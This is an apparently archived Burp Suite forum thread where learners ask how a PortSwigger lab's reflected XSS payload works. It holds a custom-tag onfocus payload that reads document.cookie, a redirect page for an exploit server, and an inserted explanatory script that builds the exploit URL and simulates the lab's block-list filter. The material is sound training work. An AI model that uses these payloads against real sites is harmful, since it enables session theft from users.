The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


How do I understand how this works? / I do not understand how this payload works

aspiringpentester | Last updated: May 13, 2021 07:59AM UTC

OK, I do not understand, because as the lab's title said, all elements/tags were blocked except custom ones; the script tag seemed not to be blocked somehow. Also, I understand that the custom tag was used (xss) in the actual URL that was used with the JavaScript:

URL encoded:
<script> location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script>

URL decoded:
<script> location = 'https://your-lab-id.web-security-academy.net/?search=<xss id=x onfocus=alert(document.cookie) tabindex=1>#x'; </script>

I started to not understand why <script> worked when it would be filtered; then I understood the location part, but then I got confused again on (tabindex=>#x). So:

1. How did <script> work? I ran Burp and saw custom tags like img2, a2 got a 200 response.
2. What is tabindex=1>#x?

I am looking forward to your response. Also, another question that came to mind was: why do I have to go to an exploit server to submit my payload to the victim? I kinda, or maybe, understand that you have to copy the URL to send to a victim in a practical PoC, but what came to mind was that I never had to do that with the first lab, which only required a payload in the search bar. Thank you.
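An added worked example, not code from this thread or from PortSwigger's lab, that separates the two halves of the payload quoted above. The <script> element lives on the attacker's exploit server page, so the lab's filter never sees it; the only thing that reaches the lab is the query string of the redirect target, and the custom <xss> element in it passes because its tag name is not a standard HTML tag. The tabindex attribute makes the otherwise non-focusable custom element focusable, and the #x fragment makes the browser focus the element whose id is x when the page loads, so onfocus fires without the victim clicking anything. That focus-on-fragment behaviour is the browser's and is not modelled here; the script below only simulates the filter (as an assumed block list of standard tag names, not the lab's real code) and shows how the URL is built and what the server versus the browser sees. The lab origin is the placeholder from the post.

```javascript
// Added example; not code from the forum post or from PortSwigger's lab.
// Models, as an assumption, the filter the lab title describes: every
// standard HTML tag name is blocked, unknown ("custom") tag names pass.
// Run with: node exploit-url.js

// Assumed block list of standard tag names (illustrative, not exhaustive).
const BLOCKED_TAGS = new Set([
  "script", "img", "a", "svg", "body", "iframe", "input", "div", "span", "p",
  "object", "embed", "video", "audio", "form", "button", "details", "select",
  "textarea", "style", "link", "meta", "base", "marquee", "math", "table",
]);

// Extract tag names from a fragment of HTML, e.g. "<xss id=x>" -> ["xss"].
function tagNames(html) {
  return [...html.matchAll(/<\s*\/?\s*([a-zA-Z][\w-]*)/g)]
    .map((m) => m[1].toLowerCase());
}

// Simulated lab filter: true if every tag in the input is a non-standard name.
function filterAllows(html) {
  return tagNames(html).every((t) => !BLOCKED_TAGS.has(t));
}

// The payload quoted in the question: a custom element with tabindex so the
// browser can focus it, and an onfocus handler. Navigating to "#x" focuses
// the element with id="x", so the handler runs with no user interaction.
const PAYLOAD = "<xss id=x onfocus=alert(document.cookie) tabindex=1>";

// Build the URL the victim is sent to. "#x" is appended OUTSIDE the encoded
// part: encoding it as %23 would turn it into query data sent to the server,
// but it must remain a fragment, which the browser keeps for itself.
function buildVictimUrl(labOrigin) {
  return `${labOrigin}/?search=${encodeURIComponent(PAYLOAD)}#x`;
}

// The page the attacker hosts on the exploit server. The <script> here runs
// in the attacker's page, not in the lab's response, so the lab's filter
// never sees it; only the redirect target's query string reaches the lab.
function exploitServerBody(labOrigin) {
  return `<script>location = '${buildVictimUrl(labOrigin)}';</script>`;
}

// What the lab server receives (decoded search parameter) versus what stays
// client-side (the fragment).
function splitVictimUrl(url) {
  const u = new URL(url);
  return { search: u.searchParams.get("search"), fragment: u.hash };
}

function main() {
  const origin = "https://your-lab-id.web-security-academy.net"; // placeholder from the post
  console.log("exploit server page:", exploitServerBody(origin));
  const { search, fragment } = splitVictimUrl(buildVictimUrl(origin));
  console.log("server sees search =", search);
  console.log("filter allows it:", filterAllows(search));
  console.log("browser keeps fragment:", fragment);
  console.log("<script> allowed:", filterAllows("<script>alert(1)</script>"));
  console.log("<img2> allowed:", filterAllows("<img2 src=x onerror=alert(1)>"));
}

main();
```

The simulated filter also reproduces the observation in the post that made-up names such as img2 come back with 200: the filter keys on the tag name, and an unknown name is not on its block list, even though the browser will render it as a generic inline element that can still carry id, tabindex and event-handler attributes.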

Ben, PortSwigger Agent | Last updated: May 13, 2021 08:35AM UTC

Hi, just to confirm, what is the name of the lab that you are currently trying to solve?

Deepak | Last updated: Sep 01, 2021 09:24AM UTC

Lab: Reflected XSS into HTML context with all tags blocked except custom ones. I couldn't get it too. What's <xss and tabindex?

Ben, PortSwigger Agent | Last updated: Sep 01, 2021 01:16PM UTC